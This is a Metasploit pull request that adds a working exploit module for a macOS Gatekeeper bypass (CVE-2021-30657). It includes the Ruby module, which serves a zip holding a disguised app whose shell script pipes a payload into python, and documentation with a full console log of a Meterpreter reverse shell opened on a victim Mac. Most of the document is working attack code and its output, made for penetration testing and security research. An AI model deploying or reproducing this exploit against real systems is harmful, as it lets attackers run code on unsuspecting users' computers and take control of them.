### PR TITLE
add macOS gatekeeper bypass exploit

### DIFF
--- a/documentation/modules/exploit/osx/browser/osx_gatekeeper_bypass.md
+++ b/documentation/modules/exploit/osx/browser/osx_gatekeeper_bypass.md
@@ -1,0 +1,104 @@
+## Vulnerable Application
+
+This module serves an OSX app (as a zip) that contains no Info.plist, which
+bypasses gatekeeper in macOS < 11.3.
+
+If the user visits the site on Safari, the zip file is automatically extracted,
+and clicking on the downloaded file will automatically launch the payload.
+If the user visits the site in another browser, the user must click once to unzip
+the app, and click again in order to execute the payload.
+
+## Verification Steps
+
+1. Start `msfconsole`
+1. `use exploit/osx/browser/osx_gatekeeper_bypass`
+1. `set LHOST <tab>`
+1. `set SRVHOST <tab>`
+1. `exploit`
+1. Visit the URL on a vulnerable version of macOS
+
+## Options
+
+  No options
+
+## Scenarios
+
+### macOS Catalina 10.15.6
+
+```
+msf6 > use exploit/osx/browser/osx_gatekeeper_bypass
+[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set srvhost 192.168.37.1
+srvhost => 192.168.37.1
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set lhost 192.168.37.1
+lhost => 192.168.37.1
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > options
+
+Module options (exploit/osx/browser/osx_gatekeeper_bypass):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   APP_NAME  app              no        The application name (Default: app)
+   SRVHOST   192.168.37.1     yes       The local host or network interface to listen on. This must be an a
+                                        ddress on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT   8080             yes       The local port to listen on.
+   SSL       false            no        Negotiate SSL for incoming connections
+   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                    no        The URI to use for this exploit (default is random)
+
+
+Payload options (osx/x64/meterpreter/reverse_tcp):
+
+   Name                   Current Setting  Required  Description
+   ----                   ---------------  --------  -----------
+   LHOST                  192.168.37.1     yes       The listen address (an interface may be specified)
+   LPORT                  4444             yes       The listen port
+   MeterpreterDebugLevel  0                yes       Set debug level for meterpreter 0-3 (Default output is
+                                                      strerr)
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   macOS x64 (Native Payload)
+
+
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.37.1:4444
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > [*] Using URL: http://192.168.37.1:8080/q670M8fEMu
+[*] Server started.
+[*] 192.168.37.132   osx_gatekeeper_bypass - Request /q670M8fEMu from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
+[+] 192.168.37.132   osx_gatekeeper_bypass - macOS version 10.15.6 is vulnerable
+[*] Transmitting first stager...(210 bytes)
+[*] Transmitting second stager...(8192 bytes)
+[*] Sending stage (810096 bytes) to 192.168.37.132
+[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.132:49380) at 2021-04-29 15:21:38 -0500
+
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                 Information                           Connection
+  --  ----  ----                 -----------                           ----------
+  1         meterpreter x64/osx  space @ spaces-Mac.local (uid=501, g  192.168.37.1:4444 -> 192.168.37.132:
+                                 id=20, euid=501, egid=20) @ spaces-M  49380 (192.168.37.132)
+                                 ac.local
+
+msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: space @ spaces-Mac.local (uid=501, gid=20, euid=501, egid=20)
+meterpreter > sysinfo
+Computer     : spaces-Mac.local
+OS           : macOS Catalina (macOS 10.15.6)
+Architecture : x86
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
+```
+

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -958,7 +958,7 @@ require 'digest/sha1'
     zip.add_file("#{app_name}/Contents/Resources/", '')
     zip.add_file("#{app_name}/Contents/MacOS/", '')
     # Add the macho and mark it as executable
-    zip.add_file("#{app_name}/Contents/MacOS/#{exe_name}", exe).last.attrs = 0x10
+    zip.add_file("#{app_name}/Contents/MacOS/#{exe_name}", exe).last.attrs = 0o777
     zip.add_file("#{app_name}/Contents/Info.plist", info_plist)
     zip.add_file("#{app_name}/Contents/PkgInfo", 'APPLaplt')
     zip.pack

--- a/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
+++ b/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
@@ -1,0 +1,106 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'macOS Gatekeeper check bypass',
+        'Description' => %q{
+          This module serves an OSX app (as a zip) that contains no Info.plist, which
+          bypasses gatekeeper in macOS < 11.3.
+          If the user visits the site on Safari, the zip file is automatically extracted,
+          and clicking on the downloaded file will automatically launch the payload.
+          If the user visits the site in another browser, the user must click once to unzip
+          the app, and click again in order to execute the payload.
+        },
+        'License' => MSF_LICENSE,
+        'Targets' => [
+          [ 'macOS x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
+          [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+          [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2021-03-25',
+        'Author' => [ 'Cedric Owens' ],
+        'Notes' =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'References' => [
+          ['CVE', '2021-1810'],
+          ['CVE', '2021-30657'],
+          ['URL', 'https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508'],
+          ['URL', 'https://objective-see.com/blog/blog_0x64.html'],
+        ]
+      )
+    )
+    register_options([
+      OptString.new('APP_NAME', [false, 'The application name (Default: app)', 'app'])
+    ])
+  end
+
+  def check_useragent(user_agent)
+    if user_agent =~ /Intel Mac OS X (.*?)\)/
+      osx_version = Regexp.last_match(1).gsub('_', '.')
+      mac_osx_version = Rex::Version.new(osx_version)
+      if mac_osx_version >= Rex::Version.new('11.3')
+        print_warning "macOS version #{mac_osx_version} is not vulnerable"
+      elsif mac_osx_version < Rex::Version.new('10.15.5')
+        print_warning "macOS version #{mac_osx_version} is not vulnerable"
+      else
+        print_good "macOS version #{mac_osx_version} is vulnerable"
+        return true
+      end
+    else
+      print_warning 'Unexpected User-Agent'
+    end
+    return false
+  end
+
+  def on_request_uri(cli, request)
+    user_agent = request['User-Agent']
+    print_status("Request #{request.uri} from #{user_agent}")
+    unless check_useragent(user_agent)
+      send_not_found(cli)
+      return
+    end
+
+    app_name = datastore['APP_NAME'] || Rex::Text.rand_text_alpha(5)
+    send_response(cli, app_zip(app_name), { 'Content-Type' => 'application/zip', 'Content-Disposition' => "attachment; filename=\"#{app_name}.zip\"" })
+  end
+
+  def app_zip(app_name)
+    case target['Arch']
+    when ARCH_X64
+      payload_data = Msf::Util::EXE.to_python_reflection(framework, ARCH_X64, payload.encoded, {})
+      command = "echo \"#{payload_data}\" | python & disown"
+    when ARCH_PYTHON
+      command = "echo \"#{payload.encoded}\" | python"
+    when ARCH_CMD
+      command = payload.encoded
+    end
+
+    shell_script = <<~SCRIPT
+      #!/bin/sh
+
+      #{command}
+    SCRIPT
+
+    zip = Rex::Zip::Archive.new
+    zip.add_file("#{app_name}.app/", '')
+    zip.add_file("#{app_name}.app/Contents/", '')
+    zip.add_file("#{app_name}.app/Contents/MacOS/", '')
+    zip.add_file("#{app_name}.app/Contents/MacOS/#{app_name}", shell_script).last.attrs = 0x10
+    zip.pack
+  end
+end

--- a/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
+++ b/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
@@ -50,19 +50,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check_useragent(user_agent)
-    if user_agent =~ /Intel Mac OS X (.*?)\)/
-      osx_version = Regexp.last_match(1).gsub('_', '.')
-      mac_osx_version = Rex::Version.new(osx_version)
-      if mac_osx_version >= Rex::Version.new('11.3')
-        print_warning "macOS version #{mac_osx_version} is not vulnerable"
-      elsif mac_osx_version < Rex::Version.new('10.15.5')
-        print_warning "macOS version #{mac_osx_version} is not vulnerable"
-      else
-        print_good "macOS version #{mac_osx_version} is vulnerable"
-        return true
-      end
+    return false unless user_agent =~ /Intel Mac OS X (.*?)\)/
+
+    osx_version = Regexp.last_match(1).gsub('_', '.')
+    mac_osx_version = Rex::Version.new(osx_version)
+    if mac_osx_version >= Rex::Version.new('11.3')
+      print_warning "macOS version #{mac_osx_version} is not vulnerable"
+    elsif mac_osx_version < Rex::Version.new('10.15.6')
+      print_warning "macOS version #{mac_osx_version} is not vulnerable"
     else
-      print_warning 'Unexpected User-Agent'
+      print_good "macOS version #{mac_osx_version} is vulnerable"
+      return true
     end
     return false
   end
@@ -71,6 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
     user_agent = request['User-Agent']
     print_status("Request #{request.uri} from #{user_agent}")
     unless check_useragent(user_agent)
+      print_error 'Unexpected User-Agent'
       send_not_found(cli)
       return
     end

--- a/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
+++ b/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
@@ -30,14 +30,17 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2021-03-25',
-        'Author' => [ 'Cedric Owens' ],
+        'Author' => [
+          'Cedric Owens', # Discovery
+          'timwr' # Module
+        ],
         'Notes' =>
         {
+          'Stability' => [ CRASH_SAFE ],
           'Reliability' => [ REPEATABLE_SESSION ],
-          'SideEffects' => [ IOC_IN_LOGS ]
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
         },
         'References' => [
-          ['CVE', '2021-1810'],
           ['CVE', '2021-30657'],
           ['URL', 'https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508'],
           ['URL', 'https://objective-see.com/blog/blog_0x64.html'],

--- a/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
+++ b/modules/exploits/osx/browser/osx_gatekeeper_bypass.rb
@@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
     zip.add_file("#{app_name}.app/", '')
     zip.add_file("#{app_name}.app/Contents/", '')
     zip.add_file("#{app_name}.app/Contents/MacOS/", '')
-    zip.add_file("#{app_name}.app/Contents/MacOS/#{app_name}", shell_script).last.attrs = 0x10
+    zip.add_file("#{app_name}.app/Contents/MacOS/#{app_name}", shell_script).last.attrs = 0o777
     zip.pack
   end
 end


### PR DESCRIPTION
This adds a module to exploit a simple gatekeeper bypass. On Safari the user must click once on the app that is automatically downloaded. On Chrome the user must click on the zip to unzip it, and again on the application to launch it.
https://objective-see.com/blog/blog_0x64.html

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/osx/browser/osx_gatekeeper_bypass`
- [ ] `exploit`
- [ ] Visit the site on a vulnerable version of OSX
- [ ] Click once on the downloaded file
- [ ] **Verify** you get a session
- [ ] **Document** add documentation
